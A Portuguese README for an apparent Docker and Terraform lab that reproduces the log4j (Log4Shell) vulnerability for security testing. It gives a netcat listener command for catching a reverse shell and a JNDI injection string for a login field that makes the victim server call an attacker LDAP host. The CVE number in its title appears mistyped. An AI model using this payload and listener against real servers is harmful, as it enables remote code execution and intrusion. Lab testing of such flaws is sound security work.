
Terraform e recursos Docker para configurar rapidamente um teste do CVE-2021-44428
Este repositório foi configurado para testar rapidamente a vulnerabilidade log4j usando Docker e Hashicorp Terraform. Todos os componentes deste teste serão executados em contêineres Docker na rede Docker, acessíveis via 'host.docker.internal'.
Este ambiente de teste é derivado de uma excelente publicação do blog da Raxis: (https://raxis.com/blog/log4j-exploit)
O aplicativo vulnerável e o código do exploit vieram do cyberxml (https://github.com/cyberxml/log4j-poc).
Tudo o que fiz foi codificar o ambiente para facilitar a criação e o teste deste delicioso exploit.
Não assumo qualquer responsabilidade por efeitos adversos ou ações maliciosas que possam resultar do uso do material neste repositório. Ponto final. Cabe a você decidir se esses materiais são confiáveis e é igualmente sua responsabilidade usar essas informações de forma ética. Apenas publico essas ferramentas para que pesquisadores, estudantes e profissionais de segurança possam criar rapidamente um ambiente e testar o exploit por conta própria. Seacrest encerra.
Acesse o shell do contêiner log4j_netcat usando 'docker exec -it netcat /bin/bash' ou algo semelhante. É aqui que você receberá sua conexão de shell com o servidor vítima assim que ela for estabelecida.
Na sua sessão dentro do contêiner log4j_netcat, insira o seguinte comando para iniciar o listener:
nc -lv -s 0.0.0.0 -p 9001
No seu navegador, navegue até http://host.docker.internal:8080/log4shell/
Insira o seguinte no campo 'Username' junto com qualquer coisa que desejar no campo 'Password':
${jndi:ldap://host.docker.internal:1389/a}
Retorne ao shell do contêiner log4j_netcat e observe que você se conectou ao servidor vítima.
Vá e cause o caos!